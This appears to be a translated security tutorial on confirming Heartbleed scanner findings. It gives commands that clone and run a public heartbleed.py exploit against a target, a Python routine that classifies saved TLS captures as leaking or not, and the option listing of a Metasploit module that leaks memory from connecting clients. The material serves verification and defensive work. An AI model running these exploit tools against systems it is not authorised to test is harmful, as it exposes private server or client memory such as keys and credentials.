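This series is aimed at readers with some network-security background. It shows how to verify the vulnerabilities that scanners report in day-to-day work, so you can tell whether a finding is real or a scanner false positive. Do not use it for illegal purposes.
1. Install the OpenSSL Heartbleed test tool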
git clone https://github.com/akhld/heartbleed.git /usr/local/tools/heartbleed
cd /usr/local/tools/heartbleed
python heartbleed.py <target IP> -p <target port>
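This vulnerability allows data to be read from the server's memory. If the tool's output contains memory contents, the vulnerability exists.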
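The decision rule above ("memory contents came back, so the finding is real") can be applied to a saved capture of the probe and the reply. The following is an added example, not code from the original article or from the heartbleed.py tool. It assumes the captured records are the unencrypted TLS records exchanged before the handshake completes. The function names and sample bytes are constructed for illustration.

```python
import struct

HEARTBEAT, ALERT = 24, 21  # TLS record content types (RFC 6520 / RFC 5246)

def parse_records(data):
    """Split captured bytes into (content_type, body) TLS records."""
    records, off = [], 0
    while off + 5 <= len(data):
        ctype, _version, length = struct.unpack(">BHH", data[off:off + 5])
        body = data[off + 5:off + 5 + length]
        if len(body) < length:
            break  # truncated capture: stop instead of guessing
        records.append((ctype, body))
        off += 5 + length
    return records

def overlong_request(body):
    """True if the declared payload length cannot fit in the record (RFC 6520: discard)."""
    if len(body) < 3:
        return True
    declared = struct.unpack(">H", body[1:3])[0]
    return 1 + 2 + declared + 16 > len(body)  # type + length + payload + min padding

def classify(request, response):
    """Return 'leak', 'no-leak' or 'inconclusive' for one probe/response capture."""
    probes = [b for t, b in parse_records(request) if t == HEARTBEAT]
    if not probes or not overlong_request(probes[0]):
        return "inconclusive"  # capture does not contain an over-long heartbeat probe
    supplied = max(len(probes[0]) - 3, 0)  # payload bytes the probe really carried
    for ctype, body in parse_records(response):
        if ctype == HEARTBEAT and len(body) - 3 > supplied:
            return "leak"  # server echoed more bytes than it was given
    return "no-leak"  # alert, short echo or silence: nothing beyond the probe came back

# Constructed sample captures (not taken from a real host).
PROBE = struct.pack(">BHH", HEARTBEAT, 0x0302, 3) + struct.pack(">BH", 1, 0x4000)
LEAKY = (struct.pack(">BHH", HEARTBEAT, 0x0302, 3 + 64)
         + struct.pack(">BH", 2, 64) + b"A" * 64)
ALERTED = struct.pack(">BHH", ALERT, 0x0302, 2) + b"\x02\x0a"
WELL_FORMED = (struct.pack(">BHH", HEARTBEAT, 0x0302, 3 + 4 + 16)
               + struct.pack(">BH", 1, 4) + b"ping" + bytes(16))

if __name__ == "__main__":
    for name, resp in [("leaky", LEAKY), ("alert", ALERTED), ("silent", b"")]:
        print(name, classify(PROBE, resp))
```

A "no-leak" result from a single probe means only that nothing extra came back on that attempt. Repeat the check and confirm the installed OpenSSL version before closing the finding as a false positive.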
2. Use the msf auxiliary/server/openssl_heartbeat_client_memory module
msf > use auxiliary/server/openssl_heartbeat_client_memory
msf auxiliary(server/openssl_heartbeat_client_memory) > show options
Module options (auxiliary/server/openssl_heartbeat_client_memory):
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
HEARTBEAT_LIMIT  512              yes       The number of kilobytes of data to capture at most from each client
HEARTBEAT_READ   65535            yes       The number of bytes to leak in the heartbeat response
NEGOTIATE_TLS    false            yes       Set this to true to negotiate TLS and often leak more data at the cost of CA validation
SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT          8443             yes       The local port to listen on.
SSL              false            no        Negotiate SSL for incoming connections
SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
Auxiliary action:
Name     Description
----     -----------
Capture